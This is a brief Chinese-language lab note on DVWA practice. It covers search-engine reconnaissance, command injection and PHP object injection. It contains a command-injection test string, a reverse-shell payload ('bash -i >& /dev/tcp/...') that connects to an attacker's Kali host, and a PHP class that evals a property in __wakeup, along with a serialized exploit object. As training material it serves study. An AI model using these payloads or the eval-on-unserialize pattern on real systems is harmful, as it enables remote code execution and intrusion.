信息收集&命令注入&反序列化(dvwa)

信息收集

zoomeye 钟馗之眼
shodan 撒旦
fofa
采用hash搜索标签页上面的小图片
http.favicon.hash:-842852785

命令注入

dvwa的命令执行漏洞利用
测试是否存在命令注入

127.0.0.1 | winver

反弹shell
kali监听7777端口 nc -lvp 7777
注：测试环境Ubuntu虚拟机
dvwa命令注入输入 ;bash -i >& /dev/tcp/kali的ip地址/7777 0>&1

反序列化（对象注入）

 
	class FXLH{
		var $h='abc';
		function __wakeup(){
			@eval($this->h);
		}
	}
	$f = new FXLH;
	$f2 = serialize($f);
	print_r($f2);
	$o = $_GET['fxlh'];
	$f3 = unserialize($o);
	print_r($f3);
	
?>
<!-- 上面是复现 -->
<!-- 下面是利用 -->
?fxlh=O:4:"FXLH":1:{s:1:"h";s:10:"phpinfo();";}

序列化就是把内存的东西放硬盘里让它sleep，内存比较贵
反序列化就是把之前放硬盘里的东西扔回内存让它wakeup
__函数名 魔数
构造函数
析构函数
原理是变量覆盖

写代码的核心思想就是能复制就复制